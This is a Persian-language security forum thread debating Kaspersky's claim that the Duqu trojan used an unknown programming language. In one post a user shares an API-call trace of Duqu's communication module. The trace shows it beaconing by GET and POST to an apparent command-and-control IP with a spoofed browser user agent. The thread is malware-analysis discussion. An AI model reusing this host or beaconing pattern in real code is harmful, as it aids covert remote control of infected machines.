اطلاعیه

Collapse
No announcement yet.

استفاده از یك زبان برنامه نویسی ناشناخته در تروجان Duqu

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • استفاده از یك زبان برنامه نویسی ناشناخته در تروجان Duqu

    استفاده از یك زبان برنامه نویسی ناشناخته در تروجان Duqu




    شركت امنیتی كسپراسكای می گوید تروجانDuqu با یك زیان برنامه نویسی ناشناخته نوشته شده است. این شركت از جامعه برنامه نویسان برای شناسایی این كد درخواست كمك می كند.



    تروجان Duqu، كه توسط برخی به عنوان استاكس نت 2.0 شناخته می شود، با یك زبان برنامه نویسی ناشناخته نوشته شده است. در حالی كه محققان امنیتی تلاش می كنند تا كد رمز را در آورند، اما در مورد دستور زبان آن مطمئن نیستند.
    برخی از قسمت های آن از جمله آن هایی كه برای دانلود كردن و اجرای ماژول های اضافی است، با استاندارد C++ نوشته شده است اما بخش بزرگی از آن با یك زبان ناشناخته نوشته شده است. این بخش شامل هیچ استاندارد شناخته شده و یا توابع C++ نیست و ممكن است توسط یك گروه برنامه نویسی متفاوتی نوشته شده باشد. شركت امنیتی كسپراسكای می گوید این كد غیرمعمول مختص Duqu است. بسیاری از قسمت های آن مستقیما از استاكس نت گرفته شده است اما برخی از قسمت ها كاملا جدید هستند. این شركت نام این بخش را چارچوب كاری Duqu گذاشته است و ذكر می كند كه با زبان های C++، Objective C، جاوا، Python، Ada، Lua و زبان های برنامه نویسی دیگر نوشته نشده است. این بخش از كد Duqu توسط Microsoft’s Visual C++ نسخه 2008 كامپایل نمی شود. واقعیت این است كه ممكن است یك زبان برنامه نویسی كاملا جدید برای این تروجان ایجاد شده باشد.


    منبع:
    مرکز ماهر

  • #2
    ماکه چیز خاصی ندیدیم !!!!! اگه مشکل توی decrypt کردنه !! به این مرکز ماهر بگید زنگ بزنه که کل Decryptor رو بفرستم ).
    حالا اگه کسی خواست گزارش تحلیل RPC رو هم میزارم )... البته زیاد روی C&C مانور ندادم (امتحانات دانشگاه)

    یکبار هم این حرفو قبلا بهم گفت دلیل آوردم که این حرفا بی معنیه چون
    1- باید کامپایلر نوشته بشه (6 تا فاز داره اگراشتباه نکنم ، که کار هرکسی نیست)
    2- به صرفه نیست واسه یک malware ، کامپایلر بنویسی با syntax ، بهتره روی الگوریتم کدینگ کار کرد
    3- حتی اگر طرف پول زیادی داشته باشه و یک زبان بنویسه پس باید ساختار COFF رعایت بشه و به زبان ماشین تبدیل بشه ، از توابع هم باید پس استفاده بشه. اینکه میگن ناشناختس یخورده حرف غیرمنطقیه .
    4- هر syntax باشه با هرچیزی بالاخره با Live Debugging معلوم میشه !!!پس این خبرها جز زیر سوال بردن خودتون و مرکز ماهر ، هیچ نتیجه ی دیگه ای نداره . (یکی به اون امن پرداز هم بگه decryptor میزاری ، شبه کد IDA نزار ).
    Last edited by BioHazard; 10-14-2012, 10:09 AM.
    Shabgard становится полностью дерьмо

    Comment


    • #3
      خبرشو 5 روز پيش خوندم، جالب بود برام.

      http://www.zdnet.com/blog/security/k...language/10625

      http://www.pcworld.com/businesscente..._for_help.html

      Comment


      • #4
        اگر میشه ، لینک از وبلاگ kaspersky بزارین ! اینکه بگید کدوم فایل!؟ ایناکه دل و روده ی این بدختو ریختن بیرون

        ادیت: تنها فایلی که وقت نشد استخراج کنم اون فایل با پسوند nls بود که 302.dll ، مینداختش!!!! تو آرشیوی هم که دارم syntax ها مشخصه !!!!
        Last edited by BioHazard; 03-13-2012, 11:51 AM.
        Shabgard становится полностью дерьмо

        Comment


        • #5
          http://www.kaspersky.com/about/news/...he_Duqu_Trojan

          http://www.kaspersky.com/news?id=207576472

          Comment


          • #6

            The code your referring to .. the unknown c++ looks like the older IBM compilers found in OS400 SYS38 and the oldest sys36.

            Ùˆ


            This was a very small and powerful communications framework. The IBM system 36 had only 300MB hard drive and one megabyte of memory,the operating system came on diskettes.

            Ùˆ .....
            کامنت هاش جالب بود !! ولی چیزی هست شرط میبندم اینا زبون ننوشتن ! هرچی هست از یکچیز قدیمی یا نه خیلی زیاد مشهور استفاده کردن. ولی باز بیشتر به IBM میخوره چون framework قوی داشت.

            ادیت: تو کامنت ها به SOOC رسیدم ، که تقریبا هم درسته! اینم توضیح SOOC!
            Sooc is a C library that enables developers to write object-oriented programs in C. Sooc (Simple Object-Oriented C) comes with useful stream and collection classes and provides mechanisms for memory management, exceptions and, with pthreads, threadin
            ولی اینکه زبون بنویسن !! حرف باز غیرمنطقیه...
            Last edited by BioHazard; 03-13-2012, 12:12 PM.
            Shabgard становится полностью дерьмо

            Comment


            • #7
              تروجان رو معمولا با java و python و این تیپ زبون ها نمی نویسن.

              یک نتیحه اخلاقی می شه از این گرفت که احتمالا این رو با خود assembly نوشتن
              Last edited by 4n0nym0us; 03-13-2012, 11:47 PM.
              I'm Not Related To Anonymous Group
              بنده ارتباطی به گروه Anonymous ندارم

              Comment


              • #8
                نه عزیز ! Object Oriented هست اون تیکه از کد و با اسمبلی OO کد زدن یخورده ...... پاره میکنه.

                ادیت: فایل دامپ شده توی پست 11 هست
                نکته : فایل sort[RANDOM].nls در داخل Resource 302 هست ، ولی یجوره خاصی کد شده (بین هرچیزی junk data هست !!).
                Last edited by BioHazard; 03-14-2012, 02:47 AM.
                Shabgard становится полностью дерьмо

                Comment


                • #9
                  دوست عزیز از روی چه استدالی به این محکمی میگی که یک زبان جدید ننوشتن.
                  چرا که نه وقتی می خای چیزی داشته باشی که هیچکس ندونه چه بهتر که نحوه نوشتاری جدید داشته باشی تا هیچ کس الگو و نحوش رو ندانه.
                  فکر نمی کنم به این محکمی بشه گفت که اصلا اینکار رو نکردن!!!!!!!!!

                  Comment


                  • #10
                    روی این استدلال میگم که
                    1- کامنت های kaspersky رو خوندم ! به چند framework شک دارن (SOOC و IBM)
                    2- بازم میگم Object Oriented هست.

                    یک خواهش ، اگر دلیلی محکم برای دفاع از Duqu دارید که زبون نوشته لطفا پست بدید ، ولی اگر دانشی درمورد کامپایلر ، syntax و .. ندارید ، خوهشا پست ندید ، چون تاپیک منحرف میشه (من از بدو بچگی رک بودم ، کسی ناراحت شد ببخشید)
                    Last edited by BioHazard; 03-14-2012, 02:39 AM.
                    Shabgard становится полностью дерьмо

                    Comment


                    • #11
                      اینو میزارم خواستید روش کارکنید..... dump اون فایلی که وظیفه ارتباط رو داره هست.

                      یکبار شبیه همچین کاری رو ، ولی نه در این سطح کردم ! اونم توی C. هرچی هست با C کد زده شده (به نظر من). حالا ممکنهframework فرق داشته باشه.

                      روش کار میکنم ، نتیچه رو میگم !! ولی وقتی از send و recv استفاده میشه با syntax آشنا برای من ، نمیتونم قبول کنم که یک زبون پیاده سازی کرده باشند

                      یک چیزی بگم ! پیاده سازی یک زبون ، با پیاده سازی که کامپایلر ، استفاده از کامپایلر دیگه و ... اینا باهم فرق داره !! الان نیاد دری وری بهم بگیدا
                      اینم نتیجه ی api هاش

                      کد:
                      1	376	sortE554.nls	WSAStartup ( 514, 0x016df068	0	
                      2	376	sortE554.nls	getaddrinfo ( "206.183.111.97", "443", 0x016df220, 0x016df218	0	
                      3	376	sortE554.nls	WSASetLastError ( 0		
                      4	376	sortE554.nls	socket ( AF_INET, SOCK_STREAM, IPPROTO_TCP	268	
                      5	376	hnetcfg.dll	RpcStringBindingComposeW ( NULL, "ncalrpc", NULL, NULL, NULL, 0x016deb30	RPC_S_OK	
                      6	376	hnetcfg.dll	RpcBindingFromStringBindingW ( "ncalrpc:", 0x016deb38	RPC_S_OK	
                      7	376	hnetcfg.dll	RpcBindingSetAuthInfoExW ( 0x00341d98, "nt authority\system", RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_DEFAULT, NULL, RPC_C_AUTHZ_NONE, 0x016deb20	RPC_S_OK	
                      8	376	hnetcfg.dll	RpcStringFreeW ( 0x016deb30	RPC_S_OK	
                      9	376	sortE554.nls	WSAEventSelect ( 268, 0x00000110, FD_ACCEPT | FD_ADDRESS_LIST_CHANGE | FD_CLOSE | FD_CONNECT | FD_GROUP_QOS | FD_OOB | FD_QOS | FD_READ | FD_ROUTING_INTERFACE_CHANGE | FD_WRITE	0	
                      10	376	sortE554.nls	connect ( 268, 0x003414b8, 16	SOCKET_ERROR	10035 = A non-blocking socket operation could not be completed immediately. 
                      11	376	sortE554.nls	WSAGetLastError ( 	10035	
                      12	376	sortE554.nls	freeaddrinfo ( 0x00341490		
                      13	376	sortE554.nls	recv ( 268, 0x016dda74, 8192, 0	SOCKET_ERROR	10057 = A request to send or receive data was disallowed because the socket is not connected and (when sending on a datagram socket using a sendto call) no address was supplied. 
                      14	376	sortE554.nls	WSAGetLastError ( 	10057	
                      15	376	sortE554.nls	WSAGetLastError ( 	10057	
                      16	376	sortE554.nls	WSAEnumNetworkEvents ( 268, 0x00000110, 0x016dfd44	0	
                      17	376	sortE554.nls	send ( 268, 0x016dda78, 78, 0	78	
                      18	376	sortE554.nls	WSAEnumNetworkEvents ( 268, 0x00000110, 0x016dfd44	0	
                      19	376	sortE554.nls	recv ( 268, 0x016ddd2c, 8192, 0	SOCKET_ERROR	10054 = An existing connection was forcibly closed by the remote host. 
                      20	376	sortE554.nls	closesocket ( 268	0	
                      21	376	sortE554.nls	WinHttpCheckPlatform ( 	TRUE	
                      22	376	sortE554.nls	WinHttpOpen ( "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 (.NET CLR 3.5.30729)", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, NULL, NULL, WINHTTP_FLAG_ASYNC	0x01b04000	
                      23	376	winhttp.dll	WSAStartup ( 257, 0x016df448	0	
                      24	376	sortE554.nls	WinHttpSetTimeouts ( 0x01b04000, 60000, 60000, 60000, 0	TRUE	
                      25	376	sortE554.nls	WinHttpSetOption ( 0x01b04000, WINHTTP_OPTION_CONTEXT_VALUE, 0x016df94c, 4	TRUE	
                      26	376	sortE554.nls	WinHttpSetStatusCallback ( 0x01b04000, 0x010ae6d2, WINHTTP_CALLBACK_FLAG_ALL_COMPLETIONS | WINHTTP_CALLBACK_FLAG_CLOSE_CONNECTION | WINHTTP_CALLBACK_FLAG_CONNECT_TO_SERVER | WINHTTP_CALLBACK_FLAG_DETECTING_PROXY | WINHTTP_CALLBACK_FLAG_INTERMEDIATE_RESPONSE | WINHTTP_CALLBACK_FLAG_REDIRECT | WINHTTP_CALLBACK_, 0	NULL	0 = The operation completed successfully. 
                      27	376	sortE554.nls	WinHttpConnect ( 0x01b04000, "206.183.111.97", INTERNET_DEFAULT_HTTP_PORT, 0	0x01b04100	
                      28	376	winhttp.dll	WSAStringToAddressW ( "206.183.111.97", AF_INET, NULL, 0x016df76c, 0x016df768	0	
                      29	376	winhttp.dll	WSAStringToAddressA ( "206.183.111.97", AF_INET, NULL, 0x016df740, 0x016df73c	0	
                      30	376	sortE554.nls	WinHttpSetOption ( 0x01b04100, WINHTTP_OPTION_CONTEXT_VALUE, 0x016df8f0, 4	TRUE	
                      31	376	sortE554.nls	WinHttpSetStatusCallback ( 0x01b04100, 0x010ae6d2, WINHTTP_CALLBACK_FLAG_ALL_COMPLETIONS | WINHTTP_CALLBACK_FLAG_CLOSE_CONNECTION | WINHTTP_CALLBACK_FLAG_CONNECT_TO_SERVER | WINHTTP_CALLBACK_FLAG_DETECTING_PROXY | WINHTTP_CALLBACK_FLAG_INTERMEDIATE_RESPONSE | WINHTTP_CALLBACK_FLAG_REDIRECT | WINHTTP_CALLBACK_, 0	0x010ae6d2	
                      32	376	sortE554.nls	WinHttpOpenRequest ( 0x01b04100, "GET", "/", "HTTP/1.1", NULL, NULL, WINHTTP_FLAG_BYPASS_PROXY_CACHE	0x01c30000	
                      33	376	sortE554.nls	WinHttpSetOption ( 0x01c30000, WINHTTP_OPTION_AUTOLOGON_POLICY, 0x016df63c, 4	TRUE	
                      34	376	sortE554.nls	WinHttpSetOption ( 0x01c30000, WINHTTP_OPTION_CONTEXT_VALUE, 0x016df624, 4	TRUE	
                      35	376	sortE554.nls	WinHttpSetStatusCallback ( 0x01c30000, 0x010ae6d2, WINHTTP_CALLBACK_FLAG_ALL_COMPLETIONS | WINHTTP_CALLBACK_FLAG_CLOSE_CONNECTION | WINHTTP_CALLBACK_FLAG_CONNECT_TO_SERVER | WINHTTP_CALLBACK_FLAG_DETECTING_PROXY | WINHTTP_CALLBACK_FLAG_INTERMEDIATE_RESPONSE | WINHTTP_CALLBACK_FLAG_REDIRECT | WINHTTP_CALLBACK_, 0	0x010ae6d2	
                      36	376	sortE554.nls	WinHttpAddRequestHeaders ( 0x01c30000, "****ie: PHPSESSID=sbxcxi1grmo600gl3ghgigh22h", 4294967295, WINHTTP_ADDREQ_FLAG_ADD | WINHTTP_ADDREQ_FLAG_REPLACE	TRUE	
                      37	376	sortE554.nls	WinHttpAddRequestHeaders ( 0x01c30000, "Cache-Control: no-cache", 4294967295, WINHTTP_ADDREQ_FLAG_ADD | WINHTTP_ADDREQ_FLAG_REPLACE	TRUE	
                      38	376	sortE554.nls	WinHttpAddRequestHeaders ( 0x01c30000, "Pragma: no-cache", 4294967295, WINHTTP_ADDREQ_FLAG_ADD | WINHTTP_ADDREQ_FLAG_REPLACE	TRUE	
                      39	376	sortE554.nls	WinHttpSendRequest ( 0x01c30000, NULL, 0, NULL, 0, 0, 0	TRUE	
                      40	376	winhttp.dll	socket ( AF_INET, SOCK_DGRAM, IPPROTO_UDP	304	
                      41	376	winhttp.dll	htonl ( 2130706433	16777343	
                      42	376	winhttp.dll	bind ( 304, 0x016df758, 16	0	
                      43	376	wshtcpip.dll	htonl ( 2130706433	16777343	
                      44	376	hnetcfg.dll	getsockname ( 304, 0x016df51c, 0x016df514	0	
                      45	376	hnetcfg.dll	ntohl ( 16777343	2130706433	
                      46	376	winhttp.dll	getsockname ( 304, 0x016df748, 0x016df740	0	
                      47	376	winhttp.dll	connect ( 304, 0x016df748, 16	0	
                      48	376	wshtcpip.dll	htonl ( 2130706433	16777343	
                      49	376	wshtcpip.dll	ntohs ( 4100	1040	
                      50	376	sortE554.nls	WinHttpCheckPlatform ( 	TRUE	
                      51	376	sortE554.nls	WinHttpOpen ( "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 (.NET CLR 3.5.30729)", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, NULL, NULL, WINHTTP_FLAG_ASYNC	0x01b04300	
                      52	376	sortE554.nls	WinHttpSetTimeouts ( 0x01b04300, 60000, 60000, 60000, 0	TRUE	
                      53	376	sortE554.nls	WinHttpSetOption ( 0x01b04300, WINHTTP_OPTION_CONTEXT_VALUE, 0x016df94c, 4	TRUE	
                      54	376	sortE554.nls	WinHttpSetStatusCallback ( 0x01b04300, 0x010ae6d2, WINHTTP_CALLBACK_FLAG_ALL_COMPLETIONS | WINHTTP_CALLBACK_FLAG_CLOSE_CONNECTION | WINHTTP_CALLBACK_FLAG_CONNECT_TO_SERVER | WINHTTP_CALLBACK_FLAG_DETECTING_PROXY | WINHTTP_CALLBACK_FLAG_INTERMEDIATE_RESPONSE | WINHTTP_CALLBACK_FLAG_REDIRECT | WINHTTP_CALLBACK_, 0	NULL	0 = The operation completed successfully. 
                      55	2044	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      56	376	sortE554.nls	WinHttpConnect ( 0x01b04300, "206.183.111.97", INTERNET_DEFAULT_HTTP_PORT, 0	0x01b04400	
                      57	376	winhttp.dll	WSAStringToAddressW ( "206.183.111.97", AF_INET, NULL, 0x016df76c, 0x016df768	0	
                      58	376	winhttp.dll	WSAStringToAddressA ( "206.183.111.97", AF_INET, NULL, 0x016df740, 0x016df73c	0	
                      59	376	sortE554.nls	WinHttpSetOption ( 0x01b04400, WINHTTP_OPTION_CONTEXT_VALUE, 0x016df8f0, 4	TRUE	
                      60	376	sortE554.nls	WinHttpSetStatusCallback ( 0x01b04400, 0x010ae6d2, WINHTTP_CALLBACK_FLAG_ALL_COMPLETIONS | WINHTTP_CALLBACK_FLAG_CLOSE_CONNECTION | WINHTTP_CALLBACK_FLAG_CONNECT_TO_SERVER | WINHTTP_CALLBACK_FLAG_DETECTING_PROXY | WINHTTP_CALLBACK_FLAG_INTERMEDIATE_RESPONSE | WINHTTP_CALLBACK_FLAG_REDIRECT | WINHTTP_CALLBACK_, 0	0x010ae6d2	
                      61	376	sortE554.nls	WinHttpOpenRequest ( 0x01b04400, "POST", "/", "HTTP/1.1", NULL, NULL, WINHTTP_FLAG_BYPASS_PROXY_CACHE	0x01c30400	
                      62	376	sortE554.nls	WinHttpSetOption ( 0x01c30400, WINHTTP_OPTION_AUTOLOGON_POLICY, 0x016df63c, 4	TRUE	
                      63	376	sortE554.nls	WinHttpSetOption ( 0x01c30400, WINHTTP_OPTION_CONTEXT_VALUE, 0x016df624, 4	TRUE	
                      64	376	sortE554.nls	WinHttpSetStatusCallback ( 0x01c30400, 0x010ae6d2, WINHTTP_CALLBACK_FLAG_ALL_COMPLETIONS | WINHTTP_CALLBACK_FLAG_CLOSE_CONNECTION | WINHTTP_CALLBACK_FLAG_CONNECT_TO_SERVER | WINHTTP_CALLBACK_FLAG_DETECTING_PROXY | WINHTTP_CALLBACK_FLAG_INTERMEDIATE_RESPONSE | WINHTTP_CALLBACK_FLAG_REDIRECT | WINHTTP_CALLBACK_, 0	0x010ae6d2	
                      65	376	sortE554.nls	WinHttpAddRequestHeaders ( 0x01c30400, "****ie: PHPSESSID=sbxcxi17noq60ggkiggh3hg22g", 4294967295, WINHTTP_ADDREQ_FLAG_ADD | WINHTTP_ADDREQ_FLAG_REPLACE	TRUE	
                      66	376	sortE554.nls	WinHttpAddRequestHeaders ( 0x01c30400, "Cache-Control: no-cache", 4294967295, WINHTTP_ADDREQ_FLAG_ADD | WINHTTP_ADDREQ_FLAG_REPLACE	TRUE	
                      67	376	sortE554.nls	WinHttpAddRequestHeaders ( 0x01c30400, "Pragma: no-cache", 4294967295, WINHTTP_ADDREQ_FLAG_ADD | WINHTTP_ADDREQ_FLAG_REPLACE	TRUE	
                      68	376	sortE554.nls	WinHttpAddRequestHeaders ( 0x01c30400, "Content-Type: multipart/form-data; boundary=---------------------------cca5d450c6267c", 4294967295, WINHTTP_ADDREQ_FLAG_ADD | WINHTTP_ADDREQ_FLAG_REPLACE	TRUE	
                      69	824	winhttp.dll	getaddrinfo ( "206.183.111.97", NULL, 0x01e4f3c0, 0x01e4f40c	0	
                      70	824	winhttp.dll	freeaddrinfo ( 0x0035ca70		
                      71	824	winhttp.dll	inet_ntoa ( { S_un = { S_un_b = { s_b1 = 206, s_b2 = 183, s_b3 = 111  ...}, S_un_w = { s_w1 = 47054, s_w2 = 24943 }, S_addr = 1634711502 } }	0x003487dc	
                      72	824	winhttp.dll	htons ( 80	20480	
                      73	824	winhttp.dll	ntohs ( 20480	80	
                      74	824	winhttp.dll	socket ( AF_INET, SOCK_STREAM, IPPROTO_TCP	356	
                      75	824	winhttp.dll	inet_ntoa ( { S_un = { S_un_b = { s_b1 = 206, s_b2 = 183, s_b3 = 111  ...}, S_un_w = { s_w1 = 47054, s_w2 = 24943 }, S_addr = 1634711502 } }	0x003487dc	
                      76	824	winhttp.dll	ioctlsocket ( 356, -2147195266, 0x01e4f488	0	
                      77	824	winhttp.dll	bind ( 356, 0x01f770b8, 16	0	
                      78	824	winhttp.dll	getsockname ( 356, 0x01e4f400, 0x01e4f3fc	0	
                      79	824	winhttp.dll	ntohs ( 4356	1041	
                      80	824	winhttp.dll	connect ( 356, 0x01f770c8, 16	SOCKET_ERROR	10035 = A non-blocking socket operation could not be completed immediately. 
                      81	824	winhttp.dll	WSAGetLastError ( 	10035	
                      82	824	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      83	2044	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      84	2044	winhttp.dll	select ( 2, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      85	2044	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      86	824	winhttp.dll	setsockopt ( 356, IPPROTO_TCP, TCP_NODELAY, 0x01e4fea8, 4	0	
                      87	824	winhttp.dll	inet_ntoa ( { S_un = { S_un_b = { s_b1 = 206, s_b2 = 183, s_b3 = 111  ...}, S_un_w = { s_w1 = 47054, s_w2 = 24943 }, S_addr = 1634711502 } }	0x003487dc	
                      88	824	winhttp.dll	setsockopt ( 356, SOL_SOCKET, SO_SNDTIMEO, 0x01e4fe9c, 4	0	
                      89	824	winhttp.dll	setsockopt ( 356, SOL_SOCKET, SO_RCVTIMEO, 0x01e4fe9c, 4	0	
                      90	824	winhttp.dll	setsockopt ( 356, SOL_SOCKET, SO_LINGER, 0x01e4fe98, 4	0	
                      91	824	winhttp.dll	WSASend ( 356, 0x01e4fe20, 1, 0x01e4fe30, 0, NULL, NULL	0	
                      92	376	sortE554.nls	WinHttpReceiveResponse ( 0x01c30000, NULL	TRUE	
                      93	824	winhttp.dll	WSARecv ( 356, 0x01e4fd94, 1, 0x01e4fdac, 0x01e4fda4, NULL, NULL	SOCKET_ERROR	10035 = A non-blocking socket operation could not be completed immediately. 
                      94	824	winhttp.dll	WSARecv ( 356, 0x01e4fd94, 1, 0x01e4fdac, 0x01e4fda4, 0x01f72018, NULL	SOCKET_ERROR	997 = Overlapped I/O operation is in progress. 
                      95	824	winhttp.dll	WSAGetLastError ( 	997	
                      96	376	sortE554.nls	WinHttpSendRequest ( 0x01c30400, NULL, 0, 0x01b24050, 932, 932, 0	TRUE	
                      97	824	winhttp.dll	getaddrinfo ( "206.183.111.97", NULL, 0x01e4f3c0, 0x01e4f40c	0	
                      98	824	winhttp.dll	freeaddrinfo ( 0x003596c0		
                      99	824	winhttp.dll	inet_ntoa ( { S_un = { S_un_b = { s_b1 = 206, s_b2 = 183, s_b3 = 111  ...}, S_un_w = { s_w1 = 47054, s_w2 = 24943 }, S_addr = 1634711502 } }	0x003487dc	
                      100	824	winhttp.dll	htons ( 80	20480	
                      101	824	winhttp.dll	ntohs ( 20480	80	
                      102	824	winhttp.dll	socket ( AF_INET, SOCK_STREAM, IPPROTO_TCP	368	
                      103	824	winhttp.dll	inet_ntoa ( { S_un = { S_un_b = { s_b1 = 206, s_b2 = 183, s_b3 = 111  ...}, S_un_w = { s_w1 = 47054, s_w2 = 24943 }, S_addr = 1634711502 } }	0x003487dc	
                      104	824	winhttp.dll	ioctlsocket ( 368, -2147195266, 0x01e4f488	0	
                      105	824	winhttp.dll	bind ( 368, 0x01f770b8, 16	0	
                      106	824	winhttp.dll	getsockname ( 368, 0x01e4f400, 0x01e4f3fc	0	
                      107	824	winhttp.dll	ntohs ( 4612	1042	
                      108	824	winhttp.dll	connect ( 368, 0x01f770c8, 16	SOCKET_ERROR	10035 = A non-blocking socket operation could not be completed immediately. 
                      109	824	winhttp.dll	WSAGetLastError ( 	10035	
                      110	824	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      111	2044	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      112	2044	winhttp.dll	select ( 2, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      113	824	winhttp.dll	setsockopt ( 368, IPPROTO_TCP, TCP_NODELAY, 0x01e4fea8, 4	0	
                      114	824	winhttp.dll	inet_ntoa ( { S_un = { S_un_b = { s_b1 = 206, s_b2 = 183, s_b3 = 111  ...}, S_un_w = { s_w1 = 47054, s_w2 = 24943 }, S_addr = 1634711502 } }	0x003487dc	
                      115	2044	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      116	824	winhttp.dll	setsockopt ( 368, SOL_SOCKET, SO_SNDTIMEO, 0x01e4fe9c, 4	0	
                      117	824	winhttp.dll	setsockopt ( 368, SOL_SOCKET, SO_RCVTIMEO, 0x01e4fe9c, 4	0	
                      118	824	winhttp.dll	setsockopt ( 368, SOL_SOCKET, SO_LINGER, 0x01e4fe98, 4	0	
                      119	824	winhttp.dll	WSASend ( 368, 0x01e4fe20, 1, 0x01e4fe30, 0, NULL, NULL	0	
                      120	824	winhttp.dll	WSASend ( 368, 0x01e4fe20, 1, 0x01e4fe30, 0, NULL, NULL	0	
                      121	376	sortE554.nls	WinHttpReceiveResponse ( 0x01c30400, NULL	TRUE	
                      122	824	winhttp.dll	WSARecv ( 368, 0x01e4fd94, 1, 0x01e4fdac, 0x01e4fda4, NULL, NULL	SOCKET_ERROR	10035 = A non-blocking socket operation could not be completed immediately. 
                      123	824	winhttp.dll	WSARecv ( 368, 0x01e4fd94, 1, 0x01e4fdac, 0x01e4fda4, 0x01f72048, NULL	SOCKET_ERROR	997 = Overlapped I/O operation is in progress. 
                      124	824	winhttp.dll	WSAGetLastError ( 	997	
                      125	824	winhttp.dll	setsockopt ( 368, SOL_SOCKET, SO_LINGER, 0x01e4fe64, 4	0	
                      126	824	winhttp.dll	closesocket ( 368	0	
                      127	376	sortE554.nls	WinHttpQueryOption ( 0x01c30000, WINHTTP_OPTION_CONTEXT_VALUE, 0x016dfa28, 0x016dfa24	TRUE	
                      128	376	sortE554.nls	WinHttpCloseHandle ( 0x01c30000	TRUE	
                      129	376	winhttp.dll	closesocket ( 356	0	
                      130	376	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      131	2044	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      132	2044	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      133	376	sortE554.nls	WinHttpQueryOption ( 0x01b04100, WINHTTP_OPTION_CONTEXT_VALUE, 0x016dfa28, 0x016dfa24	TRUE	
                      134	376	sortE554.nls	WinHttpCloseHandle ( 0x01b04100	TRUE	
                      135	376	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      136	2044	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      137	2044	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      138	376	sortE554.nls	WinHttpQueryOption ( 0x01b04000, WINHTTP_OPTION_CONTEXT_VALUE, 0x016dfa28, 0x016dfa24	TRUE	
                      139	376	sortE554.nls	WinHttpCloseHandle ( 0x01b04000	TRUE	
                      140	376	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      141	2044	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      142	2044	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      143	376	sortE554.nls	WinHttpQueryOption ( 0x01c30400, WINHTTP_OPTION_CONTEXT_VALUE, 0x016dfb10, 0x016dfb0c	TRUE	
                      144	376	sortE554.nls	WinHttpCloseHandle ( 0x01c30400	TRUE	
                      145	376	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      146	2044	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      147	2044	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      148	376	sortE554.nls	WinHttpQueryOption ( 0x01b04400, WINHTTP_OPTION_CONTEXT_VALUE, 0x016dfb10, 0x016dfb0c	TRUE	
                      149	376	sortE554.nls	WinHttpCloseHandle ( 0x01b04400	TRUE	
                      150	376	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      151	2044	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      152	2044	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      153	376	sortE554.nls	WinHttpQueryOption ( 0x01b04300, WINHTTP_OPTION_CONTEXT_VALUE, 0x016dfb10, 0x016dfb0c	TRUE	
                      154	376	sortE554.nls	WinHttpCloseHandle ( 0x01b04300	TRUE	
                      155	376	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      156	2044	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      157	2044	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      158	824	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      159	2044	winhttp.dll	closesocket ( 304	0	
                      160	376	sortE554.nls	WSAStartup ( 514, 0x016def48	0	
                      161	376	sortE554.nls	getaddrinfo ( "206.183.111.97", "443", 0x016df100, 0x016df0f8	0	
                      162	376	sortE554.nls	WSASetLastError ( 0		
                      163	376	sortE554.nls	socket ( AF_INET, SOCK_STREAM, IPPROTO_TCP	348	
                      164	376	sortE554.nls	WSAEventSelect ( 348, 0x00000160, FD_ACCEPT | FD_ADDRESS_LIST_CHANGE | FD_CLOSE | FD_CONNECT | FD_GROUP_QOS | FD_OOB | FD_QOS | FD_READ | FD_ROUTING_INTERFACE_CHANGE | FD_WRITE	0	
                      165	376	sortE554.nls	connect ( 348, 0x00356118, 16	SOCKET_ERROR	10035 = A non-blocking socket operation could not be completed immediately. 
                      166	376	sortE554.nls	WSAGetLastError ( 	10035	
                      167	376	sortE554.nls	freeaddrinfo ( 0x00355c00		
                      168	376	sortE554.nls	recv ( 348, 0x016dda74, 8192, 0	SOCKET_ERROR	10035 = A non-blocking socket operation could not be completed immediately. 
                      169	376	sortE554.nls	WSAGetLastError ( 	10035	
